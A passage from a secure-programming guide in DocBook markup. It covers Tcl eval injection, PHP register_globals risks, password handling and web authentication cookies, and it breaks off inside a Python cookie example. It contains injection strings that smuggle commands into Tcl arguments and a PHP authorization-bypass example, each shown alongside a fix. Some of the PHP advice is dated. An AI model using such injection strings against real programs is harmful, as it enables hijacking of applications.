For example, Tcl was originally designed to really support only
|
||
one data type (string).
|
||
Thankfully, these issues have been addressed over time.
|
||
In particular, version 8.0 added support for more data types
|
||
(integers are stored internally as integers, lists as lists and so on).
|
||
This improves its capabilities, and in particular improves its speed.
|
||
</para>
|
||
|
||
<para>
|
||
As with essentially all scripting languages,
|
||
Tcl has an "eval" command that parses and executes arbitrary Tcl commands.
|
||
And like all such scripting languages, this eval command needs to be
|
||
used especially carefully, or an attacker could insert
|
||
characters in the input to cause malicious things to occur.
|
||
For example, an attacker may be able to insert characters
|
||
with special meaning to Tcl
|
||
such as embedded whitespace (including space and newline),
|
||
double-quote, curly braces, square brackets,
|
||
dollar signs, backslash, semicolon, or pound sign (or create input
|
||
to cause these characters to be created during processing).
|
||
This also applies to any function that passes data to eval
|
||
(depending on how eval is called).
|
||
</para>
|
||
|
||
<para>
|
||
Here is a small example that may make this concept clearer;
|
||
first, let's define a small function and then interactively invoke it
|
||
directly - note that these uses are fine:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
proc something {a b c d e} {
|
||
puts "A='$a'"
|
||
puts "B='$b'"
|
||
puts "C='$c'"
|
||
puts "D='$d'"
|
||
puts "E='$e'"
|
||
}
|
||
|
||
% # This works normally:
|
||
% something "test 1" "test2" "t3" "t4" "t5"
|
||
A='test 1'
|
||
B='test2'
|
||
C='t3'
|
||
D='t4'
|
||
E='t5'
|
||
|
||
% # Imagine that str1 is set by an attacker:
|
||
% set str1 {test 1 [puts HELLOWORLD]}
|
||
|
||
% # This works as well
|
||
% something $str1 t2 t3 t4 t5
|
||
A='test 1 [puts HELLOWORLD]'
|
||
B='t2'
|
||
C='t3'
|
||
D='t4'
|
||
E='t5'
|
||
]]>
|
||
</programlisting>
|
||
|
||
However, continuing the example, let's see how "eval"
|
||
can be incorrectly and correctly called.
|
||
If you call eval in an incorrect (dangerous) way, it
|
||
allows attackers to misuse it.
|
||
However, by using commands like list or lrange to correctly
|
||
group the input, you can avoid this problem:
|
||
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
% # This is the WRONG way - str1 is interpreted.
|
||
% eval something $str1 t2 t3
|
||
HELLOWORLD
|
||
A='test'
|
||
B='1'
|
||
C=''
|
||
D='t2'
|
||
E='t3'
|
||
|
||
% # Here's one solution, using "list".
|
||
% eval something [list $str1 t2 t3 t4 t5]
|
||
A='test 1 [puts HELLOWORLD]'
|
||
B='t2'
|
||
C='t3'
|
||
D='t4'
|
||
E='t5'
|
||
|
||
% # Here's another solution, using lrange:
|
||
% eval something [lrange $str1 0 end] t2
|
||
A='test'
|
||
B='1'
|
||
C='[puts'
|
||
D='HELLOWORLD]'
|
||
E='t2'
|
||
]]>
|
||
</programlisting>
|
||
Using lrange is useful when concatenating arguments to a called
|
||
function, e.g., with more complex libraries using callbacks.
|
||
In Tcl, eval is often used to create a one-argument version of a function
|
||
that takes a variable number of arguments, and you need to be careful
|
||
when using it this way.
|
||
Here's another example (presuming that you've defined a "printf" function):
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
proc vprintf {str arglist} {
|
||
eval printf [list $str] [lrange $arglist 0 end]
|
||
}
|
||
|
||
% printf "1+1=%d 2+2=%d" 2 4
|
||
% vprintf "1+1=%d 2+2=%d" {2 4}
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Fundamentally, when passing a command that will be eventually
|
||
evaluated, you must pass Tcl commands as a properly built list,
|
||
and not as a (possibly concatenated) string.
|
||
For example, the "after" command runs a Tcl command after a given
|
||
number of milliseconds; if the data in $param1 can be controlled by
|
||
an attacker, this Tcl code is dangerously wrong:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
# DON'T DO THIS if param1 can be controlled by an attacker
|
||
after 1000 "someCommand someparam $param1"
|
||
]]>
|
||
</programlisting>
|
||
This is wrong, because if an attacker can control the value of $param1,
|
||
the attacker can control the program.
|
||
For example, if the attacker can cause $param1 to have
|
||
'[exit]', then the program will exit.
|
||
Also, if $param1 would be '; exit', it would also exit.
|
||
</para>
|
||
|
||
<para>
|
||
Thus, the proper alternative would be:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
after 1000 [list someCommand someparam $param1]
|
||
]]>
|
||
</programlisting>
|
||
Even better would be something like the following:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set cmd [list someCommand someparam]
|
||
after 1000 [concat $cmd [list $param1]]
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Here's another example showing what you shouldn't do,
|
||
pretending that $params is data controlled by a possibly malicious user:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set params "%-20s TESTSTRING"
|
||
puts "'[eval format $params]'"
|
||
]]>
|
||
</programlisting>
|
||
will result in:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
'TESTSTRING          '
|
||
]]>
|
||
</programlisting>
|
||
But if the untrusted user sends data with an embedded newline,
|
||
like this:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set params "%-20s TESTSTRING\nputs HELLOWORLD"
|
||
puts "'[eval format $params]'"
|
||
]]>
|
||
</programlisting>
|
||
The result will be this (notice that the attacker's code was executed;
eval returns the result of the last command it ran, which here is the
empty result of the injected puts):
<programlisting width="65">
<![CDATA[
HELLOWORLD
''
|
||
]]>
|
||
</programlisting>
|
||
Wojciech Kocjan suggests that the
|
||
simplest solution in this case is to convert this to a list using
|
||
lrange, doing this:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set params "%-20s TESTINGSTRING\nputs HELLOWORLD"
|
||
puts "'[eval format [lrange $params 0 end]]'"
|
||
]]>
|
||
</programlisting>
|
||
The result would be:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
'TESTINGSTRING       '
|
||
]]>
|
||
</programlisting>
|
||
Note that this solution presumes that the potentially malicious
|
||
text is concatenated to the end of the text; as with all languages,
|
||
make sure the attacker cannot control the format text.
|
||
</para>
|
||
|
||
<para>
|
||
As a matter of style, always use curly braces
|
||
when using if, while, for, expr, and any other command which
|
||
parses an argument using expr/eval/subst.
|
||
Doing this will avoid
|
||
a common error when using Tcl called unintended double substitution
|
||
(aka double substitution).
|
||
This is best explained by example; the following code is incorrect:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
while ![eof $file] {
|
||
set line [gets $file]
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
The code is incorrect because the "![eof $file]" text will be evaluated
|
||
by the Tcl parser when the while command is executed the first time,
|
||
and not re-evaluated in every iteration as it should be.
|
||
Instead, do this:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
while {![eof $file]} {
|
||
set line [gets $file]
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
Note that both the condition, and the action to be performed,
|
||
are surrounded by curly braces.
|
||
Although there are cases where the braces are redundant, they never hurt,
|
||
and when you fail to include the curly braces where they're needed
|
||
(say, when making a minor change) subtle and hard-to-find
|
||
errors often result.
|
||
</para>
|
||
|
||
<para>
|
||
More information on good Tcl style can be found in documents such as
|
||
<ulink url="http://www.tcl.tk/doc/styleGuide.pdf">
|
||
Ray Johnson's Tcl Style Guide</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
In the past, I have stated that
|
||
I don't recommend Tcl for writing programs which must
|
||
mediate a security boundary.
|
||
Tcl seems to have improved since that time, so while I cannot guarantee
|
||
Tcl will work for your needs, I can't guarantee that any other language
|
||
will work for you either.
|
||
Again, my thanks to Wojciech Kocjan who provided some
|
||
of these suggestions on how to
|
||
write Tcl code for secure applications.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="PHP">
|
||
<title>PHP</title>
|
||
|
||
<para>
|
||
SecureReality has put out a very interesting paper titled
|
||
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''
|
||
[Clowes 2001],
|
||
which discusses some of the problems in writing secure programs in PHP,
|
||
particularly in versions before PHP 4.1.0.
|
||
Clowes concludes that
|
||
``it is very hard to write a secure PHP application (in the
|
||
default configuration of PHP), even if you try''.
|
||
</para>
|
||
|
||
<para>
|
||
Granted, there are security issues in any language, but one
|
||
particular issue stands out in older versions of PHP that arguably makes
|
||
older PHP versions
|
||
less secure than most languages: the way it loads data into its namespace.
|
||
By default, in PHP (versions 4.1.0 and lower)
|
||
all environment variables and values sent to PHP over the web
|
||
are automatically loaded into the same namespace (global variables)
|
||
that normal variables are loaded into - so attackers can set arbitrary
|
||
variables to arbitrary values, which keep their values unless explicitly
|
||
reset by a PHP program.
|
||
In addition, PHP automatically creates variables with a
|
||
default value when they're first requested, so
|
||
it's common for PHP programs to not initialize variables.
|
||
If you forget to set a variable, PHP can report it, but
|
||
by default PHP won't - and note that this is simply an error report; it
|
||
won't stop an attacker who finds an unusual way to cause it.
|
||
Thus, by default PHP allows an attacker to
|
||
completely control the values of all variables in a program unless
|
||
the program takes special care to override the attacker.
|
||
Once the program takes over, it can reset these variables,
|
||
but failing to reset
|
||
any variable (even one not obvious) might open a vulnerability in the
|
||
PHP program.
|
||
</para>
|
||
|
||
<para>
|
||
For example, the following PHP program (an example from Clowes)
|
||
intends to only let those who
|
||
know the password get some important information, but an attacker
|
||
can set ``auth'' in their web browser and subvert the authorization check:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
<?php
|
||
if ($pass == "hello")
|
||
$auth = 1;
|
||
...
|
||
if ($auth == 1)
|
||
echo "some important information";
|
||
?>
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
I and many others have complained about this particularly
|
||
dangerous problem; it's particularly a problem because
|
||
PHP is widely used.
|
||
A language that's supposed to be easy to use had better make
it easy to write secure programs, after all.
|
||
It's possible to disable this misfeature in PHP by turning the setting
|
||
``register_globals'' to ``off'', but PHP versions up through 4.1.0
set this to ``on'' by default, and PHP before 4.1.0 is harder
to use with register_globals off.
|
||
The PHP developers warned in their PHP 4.1.0 announcement that
|
||
``as of the next semi-major version of PHP, new installations of PHP will
|
||
default to having register_globals set to off.''
|
||
This has now happened; as of PHP version 4.2.0, external
|
||
variables (from the environment, the HTTP request, cookies or the web
|
||
server) are no longer registered in the global scope by default. The
|
||
preferred method of accessing these external variables is by using the new
|
||
Superglobal arrays, introduced in PHP 4.1.0.
|
||
<!--
|
||
http://linuxtoday.com/news_story.php3?ltsn=2002-04-23-016-26-NW-DV
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
PHP with ``register_globals'' set to ``on'' is a dangerous choice
|
||
for nontrivial programs - it's just too easy to write insecure programs.
|
||
However, once ``register_globals'' is set to ``off'', PHP is quite
|
||
a reasonable language for development.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
The secure default should include setting
|
||
``register_globals'' to ``off'', and also including several functions to
|
||
make it much easier for users to specify and limit the input they'll
|
||
accept from external sources.
|
||
Then web servers (such as Apache) could separately configure this
|
||
secure PHP installation.
|
||
Routines could be placed in the PHP library to make it
|
||
easy for users to list the input variables they want to accept;
|
||
some functions could check the patterns these variables must have
|
||
and/or the type that the variable must be coerced to.
|
||
In my opinion, PHP is a bad choice for secure web development
|
||
if you set register_globals on.
|
||
</para>
|
||
|
||
<para>
|
||
As I suggested in earlier versions of this book,
|
||
PHP has been trivially modified to become a reasonable choice
|
||
for secure web development.
|
||
However, note that PHP doesn't have a particularly good
|
||
security vulnerability track record
|
||
(e.g., register_globals, a file upload problem, and a format
|
||
string problem in the error reporting library);
|
||
I believe that security issues were not considered sufficiently in
|
||
early editions of PHP;
|
||
I also think that the PHP developers are now emphasizing security
|
||
and that these security issues are finally getting worked out.
|
||
One piece of evidence is the major change that the PHP developers made to
turn off register_globals by default; this had a significant impact on
|
||
PHP users, and their willingness to make this change is a good sign.
|
||
Unfortunately, it's not yet clear how secure PHP really is;
|
||
PHP just hasn't had much of a track record now that the developers
|
||
of PHP are examining it seriously for security issues.
|
||
Hopefully this will become clear quickly.
|
||
</para>
|
||
|
||
<para>
|
||
If you've decided to use PHP, here are some of my recommendations
|
||
(many of these recommendations are based on ways to counter
|
||
the issues that Clowes raises):
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Set the PHP configuration option
|
||
``register_globals'' off, and use PHP 4.2.0 or greater.
|
||
PHP 4.1.0 adds several special arrays, particularly $_REQUEST,
|
||
which makes it far simpler to develop software in PHP
|
||
when ``register_globals'' is off.
|
||
Setting register_globals off, which is the default in PHP 4.2.0,
|
||
completely eliminates the most common PHP attacks.
|
||
If you're assuming that register_globals is off, you should check for
|
||
this first (and halt if it's not true) - that way, people who install
|
||
your program will quickly know there's a problem.
|
||
Note that many third-party PHP applications cannot
|
||
work with this setting, so it can be difficult to
|
||
keep it off for an entire website.
|
||
It's possible to set register_globals off for only some programs.
|
||
For example, for Apache, you could insert these lines into the file .htaccess
|
||
in the PHP directory (or use Directory directives to control it further):
|
||
<programlisting>
|
||
php_flag register_globals Off
|
||
php_flag track_vars On
|
||
</programlisting>
|
||
However, the .htaccess file itself is ignored unless the Apache web server
|
||
is configured to permit overrides; often the Apache global configuration
|
||
is set so that AllowOverride is set to None.
|
||
So, for Apache users,
|
||
if you can convince your web hosting service to set ``AllowOverride Options''
|
||
in their configuration file (often /etc/httpd/conf/httpd.conf) for your
|
||
host, do that.
|
||
Then write helper functions to simplify loading the data you need
|
||
(and only that data).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
If you must develop software where register_globals might be on while
|
||
running (e.g., a widely-deployed PHP application),
|
||
always set values not provided by the user.
|
||
Don't depend on PHP
|
||
default values, and don't trust any variable you haven't explicitly set.
|
||
Note that you have to do this for <emphasis>every</emphasis> entry point
|
||
(e.g., every PHP program or HTML file using PHP).
|
||
The best approach is to begin each PHP program by setting all variables
|
||
you'll be using, even if you're simply resetting them to the
|
||
usual default values (like "" or 0).
|
||
This includes global variables referenced in included files,
|
||
even all libraries, transitively.
|
||
Unfortunately, this makes this recommendation hard to do, because few
|
||
developers truly know and understand all global variables that may be used
|
||
by all functions they call.
|
||
One lesser alternative is to search through HTTP_GET_VARS, HTTP_POST_VARS,
|
||
HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user provided the data -
|
||
but programmers often forget to check all sources, and what happens if
|
||
PHP adds a new data source
|
||
(e.g., HTTP_POST_FILES wasn't in old versions of PHP)?
|
||
Of course, this simply tells you how to make the best of a bad
|
||
situation; in case you haven't noticed yet, turn off
|
||
register_globals!
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Set the error reporting level to E_ALL, and resolve all errors reported
|
||
by it during testing.
|
||
Among other things, this will complain about un-initialized variables,
|
||
which are a key issue in PHP.
|
||
This is a good idea anyway whenever you start using PHP, because
|
||
this helps debug programs, too.
|
||
There are many ways to set the error reporting level, including in the
|
||
``php.ini'' file (global), the ``httpd.conf'' file (single-host),
|
||
the ``.htaccess'' file (multi-host), or at the top of the script
|
||
through the error_reporting function.
|
||
I recommend setting the error reporting level in both the php.ini file
|
||
and also at the top of the script; that way, you're protected if
|
||
(1) you forget to insert the command at the top of the script, or (2) move the
|
||
program to another machine and forget to change the php.ini file.
|
||
Thus, every PHP program should begin like this:
|
||
<programlisting width="66">
|
||
<?php error_reporting(E_ALL);?>
|
||
</programlisting>
|
||
It could be argued that this error reporting should be turned on
|
||
during development, but turned off when actually run on a real site
|
||
(since such error messages could give useful information to an attacker).
|
||
The problem is that if they're disabled during ``actual use'' it's all
|
||
too easy to leave them disabled during development.
|
||
So for the moment, I suggest the simple approach of including it
at every entry point.
|
||
A much better approach is to record all errors, but direct the error reports
|
||
so they're only included in a log file
|
||
(instead of having them reported to the attacker).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Filter any user information used to create filenames carefully, in
|
||
particular to prevent remote file access.
|
||
PHP by default comes with ``remote files'' functionality -- that means
|
||
that file-opening commands like fopen(), that in other languages can
|
||
only open local files, can actually be used to invoke web or ftp
|
||
requests from another site.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Do not use old-style PHP file uploads; use the HTTP_POST_FILES array
|
||
and related functions.
|
||
PHP supports file uploads by uploading the file to some
|
||
temporary directory with a special filename.
|
||
PHP originally set a collection of variables to indicate where that filename
|
||
was, but since an attacker can control variable names and their values,
|
||
attackers could use that ability to cause great mischief.
|
||
Instead, always use HTTP_POST_FILES and related functions to access
|
||
uploaded files.
|
||
Note that even in this case, PHP's approach permits attackers to
|
||
temporarily upload files to you with arbitrary content, which is
|
||
risky by itself.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Only place protected entry points in the document tree; place all
|
||
other code (which should be most of it) outside the document tree.
|
||
PHP has a history of unfortunate advice on this topic.
|
||
Originally, PHP users were supposed to use the ``.inc'' (include)
|
||
extension for ``included'' files, but these included files often had
|
||
passwords and other information, and Apache would just give requesters
|
||
the contents of the ``.inc'' files when asked to do so when they
|
||
were in the document tree.
|
||
Then developers gave all files a ``.php'' extension - which meant that the
|
||
contents weren't seen, but now files never meant to be entry points
|
||
became entry points and were sometimes exploitable.
|
||
As mentioned earlier, the usual security advice is the best:
|
||
place only the protected entry points (files) in the document tree, and
|
||
place other code (e.g., libraries) outside the document tree.
|
||
There shouldn't be any ``.inc'' files in the document tree at all.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Avoid the session mechanism.
|
||
The ``session'' mechanism is handy for storing persistent data, but
|
||
its current implementation has many problems.
|
||
First, by default sessions store information in temporary files - so
|
||
if you're on a multi-hosted system, you open yourself up to many attacks and
|
||
revelations.
|
||
Even those who aren't currently multi-hosted may find themselves
|
||
multi-hosted later!
|
||
You can "tie" this information into a database instead of the filesystem,
|
||
but if others on a multi-hosted database can access that database with the
|
||
same permissions, the problem is the same.
|
||
There are also ambiguities if you're not careful
|
||
(``is this the session value or an attacker's value''?)
|
||
and this is another case where an attacker can force a file or
|
||
key to reside
|
||
on the server with content of their choosing - a dangerous situation -
|
||
and the attacker can even control to some extent the name of the file or key
|
||
where this data will be placed.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
For all inputs, check that they match a pattern for acceptability
|
||
(as with any language), and then use type casting to coerce non-string data
|
||
into the type it should have.
|
||
Develop ``helper'' functions to easily check and import a selected list
|
||
of (expected) inputs.
|
||
PHP is loosely typed, and this can cause trouble.
|
||
For example, if an input datum has the value "000", it won't be equal to "0"
|
||
nor is it empty().
|
||
This is particularly important for associative arrays, because their
|
||
indexes are strings; this means that $data["000"]
|
||
is different than $data["0"].
|
||
For example, to make sure $bar has type double (after making sure it
|
||
only has the format legal for a double):
|
||
<programlisting width="66">
|
||
$bar = (double) $bar;
|
||
</programlisting>
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Be especially careful of risky functions.
|
||
This includes those that perform PHP code execution
|
||
(e.g., require(), include(), eval(), preg_replace()),
|
||
command execution
|
||
(e.g., exec(), passthru(), the backtick operator, system(), and popen()),
|
||
and open files
|
||
(e.g., fopen(), readfile(), and file()).
|
||
This is not an exhaustive list!
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Use the magic_quotes_gpc setting where appropriate - this eliminates many kinds of
|
||
attacks.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Avoid file uploads, and consider modifying the php.ini file to
|
||
disable them (file_uploads = Off).
|
||
File uploads have had security holes in the past, so on older versions of PHP this
is a necessity, and until more experience shows that they're safe,
disabling them isn't a bad idea.
|
||
Remember, in general, to secure a system you should disable or remove
|
||
anything you don't need.
|
||
<!--
|
||
http://lwn.net/2002/0307/a/php-upload.php3
|
||
-->
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
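<para>
The input-checking guideline above (match a pattern first, then coerce to
the intended type, using helper functions that import only a selected list
of expected inputs) applies in any language.
Here is a minimal sketch of the idea in Python rather than PHP; the
pattern and the names import_double and import_inputs are hypothetical,
chosen only for illustration.
</para>

```python
import re

# Hypothetical pattern for an acceptable decimal number: optional sign,
# digits, optional fractional part. Tighten it to what the application needs.
DOUBLE_PATTERN = re.compile(r"[+-]?[0-9]{1,15}(\.[0-9]{1,15})?")


def import_double(raw):
    """Return raw as a float if it matches DOUBLE_PATTERN, else raise ValueError."""
    if not isinstance(raw, str) or DOUBLE_PATTERN.fullmatch(raw) is None:
        raise ValueError("input is not an acceptable number")
    return float(raw)


def import_inputs(form, expected):
    """Import only the expected fields; 'expected' maps field name to a checker."""
    return {name: check(form.get(name)) for name, check in expected.items()}


if __name__ == "__main__":
    # The unexpected field is never copied into the program's own variables.
    form = {"bar": "000", "unexpected": "ignored"}
    print(import_inputs(form, {"bar": import_double}))
```

<para>
Fields that are missing or malformed raise an error instead of silently
taking on a default, and fields that were not asked for are simply ignored.
</para>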
|
||
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="special">
|
||
<title>Special Topics</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 16:22 (NIV)</attribution>
|
||
<para>
|
||
Understanding is a fountain of life to those who have it,
|
||
but folly brings punishment to fools.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<sect1 id="passwords">
|
||
<title>Passwords</title>
|
||
|
||
<para>
|
||
Where possible, don't write code to handle passwords.
|
||
In particular, if the application is local,
|
||
try to depend on the normal login authentication by a user.
|
||
If the application is a CGI script, try to depend on the web server to provide
|
||
the protection as much as possible -
|
||
but see below about handling authentication in a web server.
|
||
If the application is over a network, avoid sending the password as cleartext
|
||
(where possible) since it can
|
||
be easily captured by network sniffers and reused later.
|
||
``Encrypting'' a password using some key fixed in the algorithm or using
|
||
some sort of shrouding algorithm is essentially the same as sending the
|
||
password as cleartext.
|
||
</para>
|
||
|
||
<!-- ???: Show _HOW_ to use PAM to do simple password checking; the PAM
|
||
docs are complex on this score. Also show how to ``fall through''
|
||
if you don't have PAM? -->
|
||
|
||
<para>
|
||
For networks, consider at least using digest passwords.
|
||
Digest passwords are passwords developed from hashes; typically the
|
||
server will send the client some data (e.g., date, time, name of server),
|
||
the client combines this data with the user password, the client hashes
|
||
this value (termed the ``digest password'')
|
||
and replies with just the hashed result to the server;
|
||
the server verifies this hash value.
|
||
This works because the password is never actually sent in any form; the
|
||
password is just used to derive the hash value.
|
||
Digest passwords aren't considered ``encryption'' in
|
||
the usual sense and are usually accepted even in countries with laws
|
||
constraining encryption for confidentiality.
|
||
Digest passwords are vulnerable to active attack threats but
|
||
protect against passive network sniffers.
|
||
One weakness is that, for digest passwords
|
||
to work, the server must have all the unhashed passwords, making the server
|
||
a very tempting target for attack.
|
||
</para>
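<para>
The exchange described above can be sketched as follows.
This is only an illustration under stated assumptions: the challenge is the
server name plus a random value (rather than a date and time), and the
combining step uses HMAC-SHA-256; neither choice comes from a particular
protocol, and the function names are hypothetical.
</para>

```python
import hashlib
import hmac
import secrets


def make_challenge(server_name):
    """Server side: fresh, unpredictable challenge data for one login attempt."""
    return server_name + ":" + secrets.token_hex(16)


def digest_password(password, challenge):
    """Both sides: combine the challenge with the password and hash the result."""
    return hmac.new(password.encode("utf-8"), challenge.encode("utf-8"),
                    hashlib.sha256).hexdigest()


def server_verify(stored_password, challenge, reply):
    """Server side: recompute the digest and compare in constant time."""
    expected = digest_password(stored_password, challenge)
    return hmac.compare_digest(expected, reply)


if __name__ == "__main__":
    challenge = make_challenge("foobar.com")
    good_reply = digest_password("correct horse", challenge)  # computed by the client
    bad_reply = digest_password("wrong guess", challenge)
    print(server_verify("correct horse", challenge, good_reply))
    print(server_verify("correct horse", challenge, bad_reply))
```

<para>
Note that server_verify needs the unhashed password, which is exactly the
weakness mentioned above.
</para>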
|
||
|
||
<para>
|
||
If your application permits users to set their passwords, check
|
||
the passwords and permit only ``good'' passwords
|
||
(e.g., not in a dictionary, having certain minimal length, etc.).
|
||
You may want to look at information such as
|
||
<ulink
|
||
url="http://consult.cern.ch/writeup/security/security_3.html">http://consult.cern.ch/writeup/security/security_3.html</ulink>
|
||
on how to choose a good password.
|
||
You should use PAM if you can, because it supports pluggable password checkers.
|
||
</para>
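<para>
If PAM is not available, a hand-written check might look like the
following minimal sketch.
The minimum length of 8 and the tiny word list are placeholder assumptions;
a real checker would load a full dictionary and would probably apply more
rules.
</para>

```python
MIN_LENGTH = 8  # hypothetical policy value


def is_good_password(password, dictionary_words):
    """Reject passwords that are too short or that appear in the word list.

    dictionary_words is expected to be a set of lowercase words.
    """
    if len(password) < MIN_LENGTH:
        return False
    if password.lower() in dictionary_words:
        return False
    return True


if __name__ == "__main__":
    words = {"password", "sunshine", "football"}
    for candidate in ("short", "Password", "tr1cky-pass-phrase"):
        print(candidate, is_good_password(candidate, words))
```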
|
||
</sect1>
|
||
|
||
<sect1 id="web-authentication">
|
||
<title>Authenticating on the Web</title>
|
||
<para>
|
||
On the web, a web server is usually authenticated to users by using SSL or TLS
|
||
and a server certificate - but it's not as easy to authenticate who
|
||
the users are.
|
||
SSL and TLS do support client-side certificates, but there are many practical
|
||
problems with actually using them (e.g., web browsers don't support a single
|
||
user certificate format and users find it difficult to install them).
|
||
You can learn about how to set up digital certificates from many places, e.g.,
|
||
<ulink url="http://www.petbrain.com/modules.php?op=modload&name=pki&file=index">Petbrain</ulink>.
|
||
Using Java or Javascript has its own problems, since many users disable them,
|
||
some firewalls filter them out, and they tend to be slow.
|
||
In most cases, requiring every user to install a plug-in is impractical too,
|
||
though if the system is only for an intranet for a relatively
|
||
small number of users this may be appropriate.
|
||
</para>
|
||
|
||
<para>
|
||
If you're building an intranet application, you should generally use
|
||
whatever authentication system is used by your users.
|
||
Unix-like systems tend to use Kerberos, NIS+, or LDAP.
|
||
You may also need to deal with Windows-based authentication schemes
|
||
(which can be viewed as proprietary variants of Kerberos and LDAP).
|
||
Thus, if your organization depends on Kerberos,
|
||
design your system to use Kerberos.
|
||
Try to separate the authentication system from the rest of your application,
|
||
since the organization may (will!) change their authentication system over
|
||
time.
|
||
</para>
|
||
|
||
<para>
|
||
Many techniques don't work or don't work very well.
|
||
One approach that works in some cases
|
||
is to use ``basic authentication'', which is built into
|
||
essentially all browsers and servers.
|
||
Unfortunately, basic authentication sends passwords unencrypted, so it
|
||
makes passwords easy to steal; basic authentication by itself is really
|
||
useful only for worthless information.
|
||
You could store authentication information in the URLs selected by the users,
|
||
but for most circumstances you should never do this - not only are
|
||
the URLs sent unprotected over the wire (as with basic authentication),
|
||
but there are too many other ways that
|
||
this information can leak to others
|
||
(e.g., through the browser history logs stored by many browsers,
|
||
logs of proxies, and to other web sites through the Referer: field).
|
||
You could wrap all communication with a web server using
|
||
an SSL/TLS connection (which would encrypt it); this is secure
|
||
(depending on how you do it), and it's
|
||
necessary if you have important data, but note that
|
||
this is costly in terms of performance.
|
||
You could also use ``digest authentication'', which exposes the communication
|
||
but at least authenticates the user without exposing the
|
||
underlying password used to authenticate the user.
|
||
Digest authentication is intended to be a simple partial solution for
|
||
low-value communications,
|
||
but digest authentication
|
||
is not widely supported in an interoperable way by web browsers and servers.
|
||
In fact, as noted in a March 18, 2002 eWeek article,
|
||
Microsoft's web client (Internet Explorer) and web server (IIS)
|
||
incorrectly implement the standard (RFC 2617), and thus won't work with
|
||
other servers or browsers. Since Microsoft
|
||
doesn't view this incorrect implementation as a serious
|
||
problem, it will be a very long time before most of their customers have
|
||
a correctly-working program.
|
||
<!-- http://www.eweek.com/article/0,3658,s=702&a=24177,00.asp -->
|
||
</para>
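<para>
To see why basic authentication makes passwords easy to steal, note that
the Authorization header carries the username and password merely
base64-encoded, not encrypted.
The short sketch below (the function name is hypothetical) recovers both
from a captured header value.
</para>

```python
import base64


def decode_basic_header(header_value):
    """Recover (username, password) from a Basic Authorization header value."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic authorization header")
    decoded = base64.b64decode(encoded).decode("utf-8")
    username, _, password = decoded.partition(":")
    return username, password


if __name__ == "__main__":
    # What a browser would send for user "fred" with password "secret".
    header = "Basic " + base64.b64encode(b"fred:secret").decode("ascii")
    print(header)
    print(decode_basic_header(header))
```

<para>
Anyone who can observe the request can run the same decoding step, which is
why basic authentication should only be used inside an encrypted connection.
</para>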
|
||
|
||
<para>
|
||
Thus, the most common technique for authenticating on the web today is
|
||
through cookies.
|
||
Cookies weren't really designed for this purpose, but they can be used
|
||
for authentication - but there are many wrong ways to use them that
|
||
create security vulnerabilities, so be careful.
|
||
For more information about cookies, see IETF RFC 2965, along with the
|
||
older specifications about them.
|
||
Note that to use cookies, some browsers (e.g., Microsoft
|
||
Internet Explorer 6) may insist that you
|
||
have a privacy profile (named p3p.xml on the root directory of the server).
|
||
</para>
|
||
|
||
<para>
|
||
Note that some users don't accept cookies, so this solution still has
|
||
some problems.
|
||
If you want to support these users,
|
||
you should send this authentication information back and forth via
|
||
HTML form hidden fields
|
||
(since nearly all browsers support them without concern).
|
||
You'd use the same approach as with cookies - you'd just use a different
|
||
technology to have the data sent from the user to the server.
|
||
Naturally, if you implement this approach, you need to include settings to
|
||
ensure that these pages aren't cached for use by others.
|
||
However, while I think avoiding cookies
|
||
is preferable, in practice these other approaches often require
|
||
much more development effort.
|
||
Since it's so hard to implement this on a large scale for many
|
||
application developers, I'm not currently stressing these approaches.
|
||
I would rather describe an approach that is reasonably secure and
|
||
reasonably easy to implement, than emphasize approaches that are too
|
||
hard to implement correctly (by either developers or users).
|
||
However, if you can do so without much effort, by all means support
|
||
sending the authentication information using form hidden fields and
|
||
an encrypted link (e.g., SSL/TLS).
|
||
As with all cookies, for these cookies you
|
||
should turn on the HttpOnly flag unless
|
||
you have a web browser script that must be able to read the cookie.
|
||
</para>
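<para>
As a small illustration of the HttpOnly advice above, here is one way to
build such a cookie header with Python's standard http.cookies module.
The cookie name ``auth'' and the function name are assumptions made for
this sketch, and the Secure flag is added on the assumption that the site
uses an encrypted link.
</para>

```python
from http.cookies import SimpleCookie


def build_auth_cookie(token):
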